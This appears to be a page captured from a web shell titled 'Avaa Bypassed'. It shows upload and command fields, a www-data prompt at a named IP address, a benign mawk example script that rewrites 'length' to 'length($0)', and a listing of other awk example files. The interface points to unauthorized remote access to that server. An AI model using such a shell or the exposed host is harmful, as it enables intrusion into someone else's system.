[ Avaa Bypassed ]




Upload:

Command:

www-data@18.188.211.44: ~ $
#!/usr/bin/mawk -f

#  ct_length.awk
#
#  replaces all length 
#  by  length($0)
#


{

  while ( i = index($0, "length") )
  {
     printf "%s" , substr($0,1, i+5)  # ...length
     $0 = substr($0,i+6)

     if ( match($0, /^[ \t]*\(/) )
     {
       # its OK
       printf "%s", substr($0, 1, RLENGTH)
       $0 = substr($0, RLENGTH+1)
     }
     else # length alone
       printf "($0)"

  }
  print
}

Filemanager

Name Type Size Permission Actions
ct_length.awk File 407 B 0755
decl.awk File 2.97 KB 0755
deps.awk File 1.28 KB 0755
eatc.awk File 492 B 0755
gdecl.awk File 2.73 KB 0755
hcal File 13.72 KB 0755
hical File 2.89 KB 0755
nocomment.awk File 590 B 0755
primes.awk File 1.03 KB 0755
qsort.awk File 1.07 KB 0755